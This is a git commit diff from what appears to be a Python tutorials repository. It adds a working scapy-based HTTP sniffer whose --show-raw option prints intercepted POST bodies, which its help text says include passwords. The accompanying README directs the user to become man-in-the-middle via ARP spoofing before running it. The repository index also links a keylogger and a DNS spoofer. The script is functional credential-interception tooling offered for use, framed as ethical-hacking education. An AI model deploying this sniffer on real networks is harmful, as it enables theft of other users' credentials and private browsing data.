added http sniffer tutorial

Author: x4nth055

README.md

@@ -12,6 +12,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
         - [Forcing a device to disconnect using scapy in Python](https://www.thepythoncode.com/article/force-a-device-to-disconnect-scapy). ([code](scapy/network-kicker))
         - [Simple Network Scanner](https://www.thepythoncode.com/article/building-network-scanner-using-scapy). ([code](scapy/network-scanner))
         - [Writing a DNS Spoofer](https://www.thepythoncode.com/article/make-dns-spoof-python). ([code](scapy/dns-spoof))
+        - [How to Sniff HTTP Packets in the Network using Scapy in Python](https://www.thepythoncode.com/article/sniff-http-packets-scapy-python). ([code](scapy/http-sniffer))
     - [Writing a Keylogger in Python from Scratch](https://www.thepythoncode.com/article/write-a-keylogger-python). ([code](ethical-hacking/keylogger))
     - [Making a Port Scanner using sockets in Python](https://www.thepythoncode.com/article/make-port-scanner-python). ([code](ethical-hacking/port_scanner))
 

scapy/http-sniffer/README.md

@@ -0,0 +1,10 @@
+# [How to Sniff HTTP Packets in the Network using Scapy in Python](https://www.thepythoncode.com/article/sniff-http-requests-scapy-python)
+to run this:
+- `pip3 install -r requirements.txt`
+- If you want to sniff locally ( in your PC ), you can directly run:
+    ```
+    python http_sniffer.py --show-raw
+    ```
+If you want to sniff http packets in the network, you gonna need to be man-in-the-middle using ARP spoofing, then you run this script.
+
+You can find arp spoofer and how to use it in [here](../arp-spoofer/)

scapy/http-sniffer/http_sniffer.py

@@ -0,0 +1,59 @@
+from scapy.all import *
+from scapy.layers.http import HTTPRequest # import HTTP packet
+from colorama import init, Fore
+
+# initialize colorama
+init()
+
+# define colors
+GREEN = Fore.GREEN
+RED   = Fore.RED
+RESET = Fore.RESET
+
+
+def sniff_packets(iface=None):
+    """
+    Sniff 80 port packets with `iface`, if None (default), then the
+    scapy's default interface is used
+    """
+    if iface:
+        # port 80 for http (generally)
+        # `process_packet` is the callback
+        sniff(filter="port 80", prn=process_packet, iface=iface, store=False)
+    else:
+        # sniff with default interface
+        sniff(filter="port 80", prn=process_packet, store=False)
+
+
+def process_packet(packet):
+    """
+    This function is executed whenever a packet is sniffed
+    """
+    if packet.haslayer(HTTPRequest):
+        # if this packet is an HTTP Request
+        # get the requested URL
+        url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()
+        # get the requester's IP Address
+        ip = packet[IP].src
+        # get the request method
+        method = packet[HTTPRequest].Method.decode()
+        print(f"\n{GREEN}[+] {ip} Requested {url} with {method}{RESET}")
+        if show_raw and packet.haslayer(Raw) and method == "POST":
+            # if show_raw flag is enabled, has raw data, and the requested method is "POST"
+            # then show raw
+            print(f"\n{RED}[*] Some useful Raw data: {packet[Raw].load}{RESET}")
+
+
+if __name__ == "__main__":
+    import argparse
+    parser = argparse.ArgumentParser(description="HTTP Packet Sniffer, this is useful when you're a man in the middle." \
+                                                 + "It is suggested that you run arp spoof before you use this script, otherwise it'll sniff your personal packets")
+    parser.add_argument("-i", "--iface", help="Interface to use, default is scapy's default interface")
+    parser.add_argument("--show-raw", dest="show_raw", action="store_true", help="Whether to print POST raw data, such as passwords, search queries, etc.")
+
+    # parse arguments
+    args = parser.parse_args()
+    iface = args.iface
+    show_raw = args.show_raw
+
+    sniff_packets(iface)

scapy/http-sniffer/requirements.txt

@@ -0,0 +1,2 @@
+scapy
+colorama